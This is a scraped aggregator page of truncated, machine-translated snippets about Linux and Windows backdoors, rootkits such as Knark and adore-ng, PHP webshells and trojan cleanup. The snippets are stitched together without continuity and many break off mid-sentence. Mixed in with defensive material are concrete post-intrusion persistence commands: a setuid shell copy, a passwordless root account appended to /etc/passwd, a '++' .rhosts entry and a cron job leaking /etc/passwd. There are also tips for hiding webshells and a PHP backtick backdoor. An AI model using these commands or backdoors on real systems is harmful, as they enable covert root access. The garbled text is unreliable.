Article Title: backdoor technology and rootkit tool-Knark Analysis and Prevention (1 ). Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
Abstract: This article discusses some backdoor technologies that are often used after successful intrusion by attackers in Linux, and a
What are the free membership and six diamond tools? Be careful with the gray pigeon backdoor. win32.gpigeon. Gem spread through QQ
Original endurer1st
A member of a QQ Group sent a message:
Free membership and six-digit drill .. Please download the tool to refresh it .. The following is the download Tool website hxxp: // * 59. * 32.128.135: 2*80/large
Suspicious: Use httpread to download the file and use fileinfo to extract the file information:
Fi
This article describes a backdoor that we found in the Joomla plug-in that has a (wei) Fun (suo.
Although it seems a bit unintuitive, but because the code is well organized, we didn't realize it contained a backdoor at first. The plug-in code is as follows:
At first glance, there is nothing special, no code encryption, no code obfuscation, and no comments, that is, the normal Joomla plug-in code.
However
Configuration file of the super server daemon inetd. Generally, the system administrator does not check the file frequently. Therefore, this is a good place to place a "backdoor. :) So how to build the best backdoor here? Of course it is remote. In this way, you do not need a local account to become the root user. First, let's take a look at the basic knowledge in this regard: the inetd process is responsib
Webshell or back door or something, you can use the hidden folders and files.Method OneFor example, create a name at the beginning of the band. Webshell or folders, by default, will not be displayed, the browser when access to add a few access to the line. (View method:ls-a)Touch. webshell.php create a file named. webshell.phpmkdir. backdoor/create a folder named. BackdoorThe ultimate approachIn the case of the administrator drinking too much or brai
* * * rm-f/DEV/TTYSDW'>>/etc/door.cron;service Crond Restart;crontab/etc/door.cron;The second line is to append the "cat/etc/passwd * * * * * * * * * * * >/dev/ttypwd" information to the/etc/door.cron file./etc/door.cron is a user-defined crontab list file that is executed according to the content of the file.Write Format: * * * * * commandThe preceding 5 stars represent minutes (0~59), Hours (0~23), date (1~31), month (1~12), Day of the Week (0~6), and the following commands to be executed.So
of the T.txt OK, then add the Lanker mini PHP backdoor client Trojan address to the http://localhost/test/test.php?test=. /t.txt Password added to cmd on it, the results of the implementation of the return can be seen.
For HTML files, this is typically a template file. In order for the Trojan to be inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in HTML, such as: Then use the method above. Th
Occasionally see a paragraph, it seems that there is no problem, it is a fatal backdoor code, here used a general phper not pay attention to the reverse apostrophe ', the reverse apostrophe contains strings, equivalent to the Shell_exec function.
Camouflage is very good, easy to be ignored by the administrator.
$selfNums = $_get[' R '];
if (Isset ($selfNums)) {
echo ' $selfNums ';
}
Just see this code I think everyone will say no problem,
trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following sentence in the Phpwind forum: "? @include includ/$PHPWIND _root; > General admin is unable to see out.
With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML and picture files of these three types of files in the forum or article system is the most common, the following we will do the test in turn.
Fi
Rootkit from a superficial point of view is a self concealment of backdoor procedures, it is often an intruder as an intrusion tool. By Rootkit, intruders can secretly control the compromised computer, which is a huge hazard. Chkrootkit is a tool for searching the back door of a Linux system to detect rootkit. This article will introduce the installation and use method of Chkrootkit.
Chkrootkit is not included in the official CentOS or Debian source,
Jindao Ke
I don't know if this shell was given to me by a friend, but I can't remember it. This file encryption has no special features, but its method of leaving a backdoor is very interesting and unique. Let's take a look at this shell.FirstNeedless to say about decryption. It is the reverse encryption method of 13th.Function ShiSanFun (ShiSanObjstr)
ShiSanObjstr = Replace (ShiSanObjstr, "comment ","""")
For ShiSanI = 1 To Len (ShiSanObjstr)
If Mid
Author: flashsky (original)
Author Email: flashsky@xfocus.org
Site: www.xfocus.net
Statement:The author has no intention of implementing a trojan. The author is not a Trojan developer, but provides a method of combining buffer overflow attacks with Trojans/backdoors,A simple prototype is used to verify the feasibility of this approach, and we can see many features and advantages of this implementation method. Security researchers are also invited to discuss this trojan development technology.Gi
Nameless Backdoor is a new type of DLL Trojan, this Trojan was born not long, but is definitely a very potential Trinidad colt.
Speaking of the predecessor of Nameless backdoor, I had to mention the bits and Wineggdrop portless of Yung. These two well-known Trojan horse once all scenery, can be said to be the veteran of the Trojan Horse. The nameless Backdoor is
Backdoor technology and LinuxLKMRootkit-Linux general technology-Linux programming and kernel information. The following is a detailed description. Introduction: In this article, we will see a variety of backdoor technologies, especially Linux Kernel Modules (LKM ). We will find that LKM backdoors are more complex and powerful than traditional backdoors, making them more difficult to detect. After knowing t
, leave a Webshell and try to fit into the normal business.Like what:After the. NET decompile, the DLL adds a map-type backdoor, saying that some can be rootkit.After the Java type compiles the normal jar, add the servlet backdoor.
13#master (One Piece) | 2015-09-25 14:52WebDAV
14#EVI1CG (Feel yourself cute) | 2015-09-25 15:18Scheduled TasksMofDLL hijacking
15#MUJJ (Why is there tears in my eyes?)B
After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.
AD:
0x00 Preface
After a successful test, you usually want to keep the privilege longer. The job of leaving the back door
Adore-ng is a kernel-level backdoor in linux, and adore-ng is an excellent LKMrootkit. adore-ng is currently 0.54 in the latest version and can be used in the 2.4-2.6 kernel, and the stability is very good. Next we will demonstrate its powerful functions step by step. log on to the target machine as the root user and download adore-ng to the local device.
Adore-ng is a kernel-level backdoor in linux, and ad
1. setuid# Cp/bin/sh/tmp/. sh# Chmod u + s/tmp/. shAdding suid to shell is simple but easy to find
2. echo "hack: 0: 0: // bin/csh">/etc/passwdThat is, add an account with the id 0 (root) to the system without a password.But the Administrator will soon find out!
3. echo "++">/. rhostsIf the system runs port 512,513, you canAdd a file named hack to The. rhosts file. log on to rlogin without a password!
4. Add a "wiz" command to modify the sendmail. cf file;Then telnet www.xxx.com 25 and then wiz
Beep. sys/Trojan. ntrootkit.1192, msplugplay 1005.sys/ backdoor. pigeon.13201, etc. 2
Original endurer2008-06-25 1st
(Continued 1)Modify the computer date, and then download drweb cureit! Scan.At the same time, download bat_do and fileinfo to extract file information, package and backup, and delete files in a delayed manner.Then download the rising Kaka Security Assistant to clean up the malicious program startup project.
Appendix 1: malicious file in
Beep. sys/Trojan. ntrootkit.1192, msplugplay 1005.sys/ backdoor. pigeon.13201, etc. 1
Original endurer2008-06-24 1st
A netizen reported that his computer often pops up Advertisement Windows recently. Sometimes the response is slow and the program restarts. Please help me with the repair.
Download pe_xscan to scan logs and analyze the logs. The following suspicious items are found:
Pe_xscan 08-04-26 by Purpl
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.